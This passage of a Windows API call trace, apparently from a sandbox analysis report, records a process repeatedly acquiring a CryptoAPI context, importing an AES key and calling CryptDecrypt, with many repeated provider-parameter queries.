pdwDataLen=0x18a1f8) returned 1 [0121.637] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.637] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.637] CoTaskMemFree (pv=0x7879a8) [0121.637] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.637] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.637] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemFree (pv=0x7879a8) [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemFree (pv=0x7879a8) [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemFree (pv=0x7879a8) [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemFree (pv=0x7879a8) [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemFree (pv=0x7879a8) [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemFree (pv=0x7879a8) [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.638] CoTaskMemFree (pv=0x7879a8) [0121.638] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemFree (pv=0x7879a8) [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemFree (pv=0x7879a8) [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemFree (pv=0x7879a8) [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemFree (pv=0x7879a8) [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemFree (pv=0x7879a8) [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemFree (pv=0x7879a8) [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.639] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.639] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.640] CoTaskMemFree (pv=0x7879a8) [0121.640] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.640] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.640] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.640] CoTaskMemFree (pv=0x7879a8) [0121.640] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.640] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.640] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.640] CoTaskMemFree (pv=0x7879a8) [0121.640] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.640] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.640] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.640] CoTaskMemFree (pv=0x7879a8) [0121.640] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.640] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.640] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.640] CoTaskMemFree (pv=0x7879a8) [0121.640] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 0 [0121.668] CryptImportKey (in: hProv=0x766d40, pbData=0x2621a20, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.669] CryptContextAddRef (hProv=0x766d40, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.815] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x18a224 | out: pfEnabled=0x18a224) returned 0x0 [0121.951] CryptContextAddRef (hProv=0x766d40, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.952] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x74f910) returned 1 [0121.952] CryptContextAddRef (hProv=0x766d40, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.952] CryptSetKeyParam (hKey=0x74f910, dwParam=0x4, pbData=0x2625010*=0x1, dwFlags=0x0) returned 1 [0121.952] CryptSetKeyParam (hKey=0x74f910, dwParam=0x1, pbData=0x2624fdc, dwFlags=0x0) returned 1 [0121.953] CryptDecrypt (in: hKey=0x74f910, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26250f4, pdwDataLen=0x18a1f0 | out: pbData=0x26250f4, pdwDataLen=0x18a1f0) returned 1 [0121.954] CryptDecrypt (in: hKey=0x74f910, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2625154, pdwDataLen=0x18a220 | out: pbData=0x2625154, pdwDataLen=0x18a220) returned 1 [0121.955] CryptDecrypt (in: hKey=0x74f910, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2625198, pdwDataLen=0x18a220 | out: pbData=0x2625198, pdwDataLen=0x18a220) returned 0 [0121.960] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.960] CryptReleaseContext (hProv=0x766d40, dwFlags=0x0) returned 1 [0121.960] CryptReleaseContext (hProv=0x766d40, dwFlags=0x0) returned 1 [0121.965] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x766dc8) returned 1 [0121.966] CryptImportKey (in: hProv=0x766dc8, pbData=0x26260b4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.966] CryptContextAddRef (hProv=0x766dc8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.967] CryptContextAddRef (hProv=0x766dc8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.967] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x74f950) returned 1 [0121.967] CryptContextAddRef (hProv=0x766dc8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.967] CryptSetKeyParam (hKey=0x74f950, dwParam=0x4, pbData=0x2626824*=0x1, dwFlags=0x0) returned 1 [0121.967] CryptSetKeyParam (hKey=0x74f950, dwParam=0x1, pbData=0x26267f0, dwFlags=0x0) returned 1 [0121.967] CryptDecrypt (in: hKey=0x74f950, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2626904, pdwDataLen=0x18a220 | out: pbData=0x2626904, pdwDataLen=0x18a220) returned 1 [0121.967] CryptDecrypt (in: hKey=0x74f950, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x262694c, pdwDataLen=0x18a220 | out: pbData=0x262694c, pdwDataLen=0x18a220) returned 0 [0121.967] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.967] CryptReleaseContext (hProv=0x766dc8, dwFlags=0x0) returned 1 [0121.967] CryptReleaseContext (hProv=0x766dc8, dwFlags=0x0) returned 1 [0121.967] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x766e50) returned 1 [0121.968] CryptImportKey (in: hProv=0x766e50, pbData=0x2626c84, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.968] CryptContextAddRef (hProv=0x766e50, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.969] CryptContextAddRef (hProv=0x766e50, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.969] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8800) returned 1 [0121.969] CryptContextAddRef (hProv=0x766e50, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.969] CryptSetKeyParam (hKey=0x4bc8800, dwParam=0x4, pbData=0x26273f4*=0x1, dwFlags=0x0) returned 1 [0121.969] CryptSetKeyParam (hKey=0x4bc8800, dwParam=0x1, pbData=0x26273c0, dwFlags=0x0) returned 1 [0121.969] CryptDecrypt (in: hKey=0x4bc8800, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26274d4, pdwDataLen=0x18a220 | out: pbData=0x26274d4, pdwDataLen=0x18a220) returned 1 [0121.969] CryptDecrypt (in: hKey=0x4bc8800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2627524, pdwDataLen=0x18a220 | out: pbData=0x2627524, pdwDataLen=0x18a220) returned 0 [0121.969] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.969] CryptReleaseContext (hProv=0x766e50, dwFlags=0x0) returned 1 [0121.969] CryptReleaseContext (hProv=0x766e50, dwFlags=0x0) returned 1 [0121.969] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x766ed8) returned 1 [0121.970] CryptImportKey (in: hProv=0x766ed8, pbData=0x26278a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.970] CryptContextAddRef (hProv=0x766ed8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.970] CryptContextAddRef (hProv=0x766ed8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.970] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8880) returned 1 [0121.970] CryptContextAddRef (hProv=0x766ed8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.970] CryptSetKeyParam (hKey=0x4bc8880, dwParam=0x4, pbData=0x2628014*=0x1, dwFlags=0x0) returned 1 [0121.970] CryptSetKeyParam (hKey=0x4bc8880, dwParam=0x1, pbData=0x2627fe0, dwFlags=0x0) returned 1 [0121.970] CryptDecrypt (in: hKey=0x4bc8880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26280f4, pdwDataLen=0x18a220 | out: pbData=0x26280f4, pdwDataLen=0x18a220) returned 1 [0121.971] CryptDecrypt (in: hKey=0x4bc8880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2628138, pdwDataLen=0x18a220 | out: pbData=0x2628138, pdwDataLen=0x18a220) returned 0 [0121.971] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.971] CryptReleaseContext (hProv=0x766ed8, dwFlags=0x0) returned 1 [0121.971] CryptReleaseContext (hProv=0x766ed8, dwFlags=0x0) returned 1 [0121.971] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x766f60) returned 1 [0121.971] CryptImportKey (in: hProv=0x766f60, pbData=0x2628468, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.972] CryptContextAddRef (hProv=0x766f60, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.972] CryptContextAddRef (hProv=0x766f60, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.972] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8900) returned 1 [0121.972] CryptContextAddRef (hProv=0x766f60, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.972] CryptSetKeyParam (hKey=0x4bc8900, dwParam=0x4, pbData=0x2628bd8*=0x1, dwFlags=0x0) returned 1 [0121.972] CryptSetKeyParam (hKey=0x4bc8900, dwParam=0x1, pbData=0x2628ba4, dwFlags=0x0) returned 1 [0121.972] CryptDecrypt (in: hKey=0x4bc8900, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2628cb8, pdwDataLen=0x18a220 | out: pbData=0x2628cb8, pdwDataLen=0x18a220) returned 1 [0121.972] CryptDecrypt (in: hKey=0x4bc8900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2628cf8, pdwDataLen=0x18a220 | out: pbData=0x2628cf8, pdwDataLen=0x18a220) returned 0 [0121.972] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.972] CryptReleaseContext (hProv=0x766f60, dwFlags=0x0) returned 1 [0121.972] CryptReleaseContext (hProv=0x766f60, dwFlags=0x0) returned 1 [0121.975] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x766fe8) returned 1 [0121.976] CryptImportKey (in: hProv=0x766fe8, pbData=0x2629010, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.976] CryptContextAddRef (hProv=0x766fe8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.976] CryptContextAddRef (hProv=0x766fe8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.976] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8980) returned 1 [0121.976] CryptContextAddRef (hProv=0x766fe8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.976] CryptSetKeyParam (hKey=0x4bc8980, dwParam=0x4, pbData=0x2629780*=0x1, dwFlags=0x0) returned 1 [0121.976] CryptSetKeyParam (hKey=0x4bc8980, dwParam=0x1, pbData=0x262974c, dwFlags=0x0) returned 1 [0121.976] CryptDecrypt (in: hKey=0x4bc8980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2629860, pdwDataLen=0x18a220 | out: pbData=0x2629860, pdwDataLen=0x18a220) returned 1 [0121.977] CryptDecrypt (in: hKey=0x4bc8980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26298a4, pdwDataLen=0x18a220 | out: pbData=0x26298a4, pdwDataLen=0x18a220) returned 0 [0121.977] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.977] CryptReleaseContext (hProv=0x766fe8, dwFlags=0x0) returned 1 [0121.977] CryptReleaseContext (hProv=0x766fe8, dwFlags=0x0) returned 1 [0121.977] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767070) returned 1 [0121.977] CryptImportKey (in: hProv=0x767070, pbData=0x2629bd4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.977] CryptContextAddRef (hProv=0x767070, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.978] CryptContextAddRef (hProv=0x767070, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.978] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8a00) returned 1 [0121.978] CryptContextAddRef (hProv=0x767070, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.978] CryptSetKeyParam (hKey=0x4bc8a00, dwParam=0x4, pbData=0x262a344*=0x1, dwFlags=0x0) returned 1 [0121.978] CryptSetKeyParam (hKey=0x4bc8a00, dwParam=0x1, pbData=0x262a310, dwFlags=0x0) returned 1 [0121.978] CryptDecrypt (in: hKey=0x4bc8a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x262a424, pdwDataLen=0x18a220 | out: pbData=0x262a424, pdwDataLen=0x18a220) returned 1 [0121.978] CryptDecrypt (in: hKey=0x4bc8a00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x262a468, pdwDataLen=0x18a220 | out: pbData=0x262a468, pdwDataLen=0x18a220) returned 0 [0121.978] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.978] CryptReleaseContext (hProv=0x767070, dwFlags=0x0) returned 1 [0121.978] CryptReleaseContext (hProv=0x767070, dwFlags=0x0) returned 1 [0121.978] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7670f8) returned 1 [0121.979] CryptImportKey (in: hProv=0x7670f8, pbData=0x262a7f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.979] CryptContextAddRef (hProv=0x7670f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.979] CryptContextAddRef (hProv=0x7670f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.979] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8a80) returned 1 [0121.980] CryptContextAddRef (hProv=0x7670f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.980] CryptSetKeyParam (hKey=0x4bc8a80, dwParam=0x4, pbData=0x262af78*=0x1, dwFlags=0x0) returned 1 [0121.980] CryptSetKeyParam (hKey=0x4bc8a80, dwParam=0x1, pbData=0x262af44, dwFlags=0x0) returned 1 [0121.980] CryptDecrypt (in: hKey=0x4bc8a80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x262b05c, pdwDataLen=0x18a1f0 | out: pbData=0x262b05c, pdwDataLen=0x18a1f0) returned 1 [0121.980] CryptDecrypt (in: hKey=0x4bc8a80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x262b0bc, pdwDataLen=0x18a220 | out: pbData=0x262b0bc, pdwDataLen=0x18a220) returned 1 [0121.980] CryptDecrypt (in: hKey=0x4bc8a80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x262b108, pdwDataLen=0x18a220 | out: pbData=0x262b108, pdwDataLen=0x18a220) returned 0 [0121.980] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.980] CryptReleaseContext (hProv=0x7670f8, dwFlags=0x0) returned 1 [0121.980] CryptReleaseContext (hProv=0x7670f8, dwFlags=0x0) returned 1 [0121.980] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767180) returned 1 [0121.981] CryptImportKey (in: hProv=0x767180, pbData=0x262b494, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.981] CryptContextAddRef (hProv=0x767180, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.981] CryptContextAddRef (hProv=0x767180, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.981] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8b00) returned 1 [0121.981] CryptContextAddRef (hProv=0x767180, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.981] CryptSetKeyParam (hKey=0x4bc8b00, dwParam=0x4, pbData=0x262bc14*=0x1, dwFlags=0x0) returned 1 [0121.981] CryptSetKeyParam (hKey=0x4bc8b00, dwParam=0x1, pbData=0x262bbe0, dwFlags=0x0) returned 1 [0121.981] CryptDecrypt (in: hKey=0x4bc8b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x262bcf8, pdwDataLen=0x18a1f0 | out: pbData=0x262bcf8, pdwDataLen=0x18a1f0) returned 1 [0121.981] CryptDecrypt (in: hKey=0x4bc8b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x262bd58, pdwDataLen=0x18a220 | out: pbData=0x262bd58, pdwDataLen=0x18a220) returned 1 [0121.982] CryptDecrypt (in: hKey=0x4bc8b00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x262bda4, pdwDataLen=0x18a220 | out: pbData=0x262bda4, pdwDataLen=0x18a220) returned 0 [0121.982] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.982] CryptReleaseContext (hProv=0x767180, dwFlags=0x0) returned 1 [0121.982] CryptReleaseContext (hProv=0x767180, dwFlags=0x0) returned 1 [0121.982] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767208) returned 1 [0121.982] CryptImportKey (in: hProv=0x767208, pbData=0x262c120, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0121.982] CryptContextAddRef (hProv=0x767208, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.983] CryptContextAddRef (hProv=0x767208, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.983] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bc8b80) returned 1 [0121.983] CryptContextAddRef (hProv=0x767208, pdwReserved=0x0, dwFlags=0x0) returned 1 [0121.983] CryptSetKeyParam (hKey=0x4bc8b80, dwParam=0x4, pbData=0x262c890*=0x1, dwFlags=0x0) returned 1 [0121.983] CryptSetKeyParam (hKey=0x4bc8b80, dwParam=0x1, pbData=0x262c85c, dwFlags=0x0) returned 1 [0121.983] CryptDecrypt (in: hKey=0x4bc8b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x262c970, pdwDataLen=0x18a220 | out: pbData=0x262c970, pdwDataLen=0x18a220) returned 1 [0121.983] CryptDecrypt (in: hKey=0x4bc8b80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x262c9c0, pdwDataLen=0x18a220 | out: pbData=0x262c9c0, pdwDataLen=0x18a220) returned 0 [0121.983] CryptDestroyKey (hKey=0x74f850) returned 1 [0121.983] CryptReleaseContext (hProv=0x767208, dwFlags=0x0) returned 1 [0121.983] CryptReleaseContext (hProv=0x767208, dwFlags=0x0) returned 1 [0121.983] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x767290) returned 1 [0121.984] CryptImportKey (in: hProv=0x767290, 